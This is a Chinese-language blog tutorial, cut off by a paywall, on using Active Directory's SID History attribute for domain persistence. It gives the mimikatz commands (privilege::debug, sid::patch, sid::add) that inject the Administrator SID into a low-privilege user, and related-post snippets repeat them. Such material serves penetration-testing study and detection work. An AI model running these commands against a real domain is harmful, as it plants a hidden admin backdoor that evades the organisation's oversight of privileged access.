权限维持之:SID History 域控权限维持

最新推荐文章于 2026-03-08 00:49:37 发布
原创 最新推荐文章于 2026-03-08 00:49:37 发布 · 1.1k 阅读 · 1
文章标签:

#安全 #权限维持 #SID History

SID在安全中用于跟踪访问权限,SID History在域迁移时保持用户权限。通过添加SID History,即使用户SID改变,也能保持原有访问权限。文章介绍了如何利用mimikatz在渗透测试中实现权限持久化,并提出了防御策略,如定期检查特定日志和SID为500的用户。

权限维持之:SID History 域控权限维持

1 SID 作用

​ 每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。

​ 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz可以将SID History属性添加到任意用户的SID History属性中。在渗透测试中,如果获得了域管理员权限(或者等同于域管理员权限),就可以将SID History作为实现持久化的方法。

2 利用 SID History 操作过程

  1. 使用域管理员权限的 Poweshell 查看 tester 用户的 SID History 属性

    Import-Module ActiveDirectory
Get-ADUser tester -Properties sidhistory

  2. 在域管理员权限的命令行窗口打开 mimikatz,将 Administrator 的 SID 添加到恶意用户 tester 的 SID History 属性中

    # 将高权限的 SID History 属性注入
privilege::debug
# 注入SID之前需要使用以下命令修复NTDS服务,否则无法将高权限的SID注人低权限用户的SID History属性;
sid::patch
sid::add /sam:tester /new:administrator

# 查看 tester 用户的 SID History 属性
G
最低0.47元/天 解锁文章
SID History权限维持
weixin_41082546的博客
05-05 715
一、简介   每个用户都有自己的SIDSID的作用主要是跟踪安全主体制用户连接资源时的访问权限SID History是在迁移过程中需要使用的一个属性。   如果A中的用户迁移到B中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在迁移过程中保持用户的访问权限,如果迁移后用户的SID值改变,系统会将原...
内网渗透(六十九)之权限维持SID History 滥用
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 984
SID是用于标识主体的可变长度的唯一值,每个账户都有一个系统颁发的唯一SID,其存储在数据库(中的话就存储在活动目录数据库中)。用户每次登录时,系统都会从数据库中检索该用户的SID,并将其放在该用户的访问令牌中。系统使用访问令牌中的SID来识别与Windows安全所有后续交互中的用户。当SID被用作用户或组的唯一标识符时,他再也不能用于标识另一个用户或组。在活动目录数据库中对象的objectSid属性值就是SID
SID History后门及检测思路分析
#7的博客
03-22 1336
可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的用户中注入到内存进行Dcsync或进行远程登录等,需要注意的是该操作并不会在的LDAP属性中添加,只会在攻击机的票据PAC中添加到高权限SID History。privilege::debug sid::patch sid::add /sam:whoami/new:Administrator (将Administrator的SID添加到whoami的SID History属性中)
渗透测试之子到父的横向移动(Sid History)
Candour_0的博客
02-20 586
渗透测试之子到父的横向移动(Sid History)
SIDHistory属性的利用
热门推荐
Shanfenglan's blog
12-24 4万+
文章目录1. 前言2.对某用户的SIDHistory属性进行操作2.1 查询zhangsan的SIDHistory2.2 给zhangsan用户添加管的sid2.3 删除zhangsan的SIDHistory属性3.利用思路3.1 权限维持3.2 利用当前用户的sidhistory属性防御方法 1. 前言 SIDHistory属性的存在是为了解决用户在迁移到另一个中的时候权限会改变的问题。例如用户zhangsan在A中本来是管理员,迁移到B的时候因为sid的改变有可能会变成普通用户权限,这时候如果给
渗透|权限维持SID History
weixin_42282189的博客
09-06 546
作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 SID的主要作用是跟踪安全主体制用户连接资源时的访问权限SID History 是在迁移过程中需要使用的一个属性,SID History 主要作用是在迁移过程中保持用户的访问权限,如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移用户的SID History 属性中,使迁移后的用户保持原有的权限、能够访问其原来可以访问的资源。 因此使用mimikatz可以将SID His.
1、权限维持&后门&SSP
m0_65842464的博客
02-25 1112
很多时候拿下了一台服务器权限后,可能过几天就会无法制,因为企业都会有专业人士定期查杀后门、杀毒检测、漏洞修复等,所以可能很快就会失去权限,而权限维持的目的是保证自己的权限不会掉,一直能够制目标服务器。两种方法都是盗取身份认证文件,便于长久访问的权限维持,第一种方法重启后失效,第二种方法重启后才生效,各有各的好处,所以可以配合使用。
权限维持SID History后门
01-29 596
01、简介 每个用户都有一个关联的安全标识符(SID),SID History的作用是在迁移过程中保持用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。 02、利用方式 (1)使用管理员权限查看test用户的SID History属性 PS C:\Users\Ad...
SID History 维权
anddddoooo的博客
03-01 438
根据微软的描述,SID History 属性是微软对内用户进行迁移的支持而创建的。每当对象从一个移动到另一个时,都会创建一个新的 SID,并且该新 SID 将成为 objectSID。先前的 SID 会添加到 SID History 属性中,以确保该用户迁移后仍然能访问迁移前能访问的资源。# 将 administrator 的 sid 添加到 deandean 的 SID History 属性中。
-笔记四(综合应用)
欢迎关注微💌,不定期发布安全运维、甲方视角安全建设、乙方厂商专业安全服务内容。
11-25 3722
文章目录一. 添加路由1.1 路由1.2 sockes1.3 shell乱码二. 判断环境三. 定位四. 非信息收集4.1 防火墙问题4.2 端口转发五. 凭据窃取5.1 mimikatz5.2 procdump+mimikatz5.3 LaZagne六. 内横向6.1 IPC+计划任务6.1.2 ipc6.1.3 计划任务6.1.4 常见IPC错误6.2 PsTools6.4 WMI6.4.1 wmiexec.vbs6.5 WinRM6.5.1 WinRS6.5.2 Powershell Inv
让你搞清楚Windows 系统SID;什么是计算机SID,用户SID;如何查看SID,修改SID
ITinfra_夏洛
04-07 1万+
如果创建帐户,再删除帐户,然后使用相同的用户名创建另一个帐户,则新帐户将不具有授权给前一个帐户的权力或权限,原因是该帐户具有不同的 SID 号。**4、**使用 WMIC(Windows Management Instrumentation Command-line):(用户SID可查看所有)**6、**PowerShell (计算机在中的SID,未加入则为本机SID)**3、**cmd命令,最后面-xxx (用户SID)**2、**Newsid (计算机SID)2、sysperp重置;
利用SID History建立隐蔽后门
渗透之路,攻防之间皆学问
03-02 547
SID History是一个支持迁移方案的属性,使得一个账户的访问权限可以有效的克隆到另外一个账户,这在迁移过程中非常有效。例如,当Domain A中的用户迁移到Domain B时,会在Domain B中创建一个新的用户账户,并将Domain A用户的SID添加到Domain B的用户账户的SID History属性中。在实战中,红队人员可以将管理员用户的SID添加到其他用户的SID History属性中,以此建立一个隐蔽的后门。通过powershell查看yuwin7用户的属性。
权限维持 SID-history
m0_64815693的博客
06-04 231
权限维持 SID-history
内网渗透之——渗透里常用的权限维持方法
wsnbbz的博客
04-03 2909
前言 在我们拿到账号密码后,为了防止密码被改,需要使用权限维持维持我们取得的权限 具体账号密码获取方法点此跳转 票据验证流程 1.首先将明文密码发送给AS服务器,AS服务器给我们一个TGT 2.拿着TGT去访问TGS服务器,TGS服务器给我们一个ST 3.使用获取到的ST访问对应的服务 权限维持-黄金票据 介绍 ms14068的漏洞原理是伪造管的TGT,而黄金票...
有关环境下SID号的问题(续)
windowsxpwyd的专栏
05-28 5330
      我们在做活动目录的实验的时候,为了能够快速的构建出多台虚拟机,都会采用类似于克隆的手段,或者直接复制虚拟机的磁盘文件。但是,这样产生出来的多个虚拟机系统的SID号是相同的,然后我们又会使用NewSID这个工具(也是sysinternals出品的)去更改SID号。课堂上我们也是这么讲的,网上很多的资料也是这么说的,但其实在某种情况下用不着去更改SID,这种情况就是这些克隆出来的虚拟机将来
关于AD中SID的参考
黄森林
06-25 1705
http://support.microsoft.com/kb/314828/zh-cn 我也是非常认同SID重复的问题,这给以后的运维带来潜在的危害。对AD的健康也是有很大影响的,特别是针对服务器。GHOST,一直是我不赞同的做法,就算是做了GHOST,在加入之前应该NEWSID一下--------本文简要介绍了 Windows XP 所支持的用于克隆或复制 Windows X
部署必看:Windows Server SID检查与修改避坑指南(附AD集成验证)
最新发布
weixin_28365523的博客
03-08 142
本文深入探讨了Windows Server部署中系统唯一标识符(SID)的核心原理与实战管理。文章提供了从SID健康检查、冲突检测到使用Sysprep安全修改的完整避坑指南,并重点分析了在Active Directory集成环境中部署制器时,如何预防和解决因SID重复或冲突引发的各类故障,确保环境底层安全稳固。
Windows Server操作系统sid系统唯一标识符查看和修改
龙月的博客
10-31 3207
作为windows系统唯一的标识,对某些集群业务有依赖关系,如果重复可能导致集群部署异常。如:AD 就依赖功能。但是虚拟机使用同一个虚拟文件进行部署,就可能会导致重复的情况。
什么是SID
weixin_34399060的博客
12-31 1584
SID是什么意思?好像接触活动目录activedirectory的朋友,很少有人问什么是SIDSID是什么意思?其实活动目录中经常遇到的ghost克隆问题,双系统加入老是会有一个自动退出,等等问题都与sid有关。此外还有很多朋友关心如何查看SID,修改SID?《SID是什么》这篇文章就为大家解释一下SID的问题。   SID是什么意思 ============ 对于那些一看到缩写...
内信息收集
qq_61988806的博客
01-21 619
内网信息收集
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值